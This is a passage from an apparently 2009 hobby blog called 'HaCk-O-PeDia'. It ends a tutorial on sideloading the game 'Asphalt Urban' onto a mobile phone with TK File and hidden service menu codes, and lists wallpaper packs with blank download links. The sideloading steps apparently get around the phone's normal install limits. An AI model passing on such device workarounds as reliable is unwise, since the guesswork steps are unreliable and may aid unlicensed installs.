This step is crucial and involve hit and trial and luck. open TK File(ur phone should be attached to usb and in pc studio mode). Now near to yellow question mark(see pic) , there is a setting button. click it it will ask for PORT.

If no port is mentioned , add manually in add port. To manually do

(For me COM3 Works....)

its hit and trial in some cases.
But it will connect for sure. Do repeat your process. Mostly it connects from COM5 , COM6 and COM7.

if problem occurs mail me at

Click the image to get it enlarged

Transfer Asphalt urban folder to
EXE---->>>JAVA------>>games (you can delete the locked games from here)

It is not done yet. De-attach your phone from pc. Type *#6984125*# from your phone. A menu will pop. Go To INTERNALS. A master code will be asked. Type *#9072641*# Go to Storage Settings select Update Java DB.

Hurray you are done. Enjoy your game. Repeat steps to install other games.


30 September 2009

XP Wallpaper Pack

Download link:
Download link:
Download link:
Download link:
Download link:
Download link:
Download link:

Amazing Wallpapers Pack

40 JPG | 1600x1200 | 24 Mb


29 September 2009

High Defintion Wallpapers



Views This Month


HaCk-O-PeDia - The Hacker's Encyclopedia. Copyright 2010 All Rights Reserved To Ankit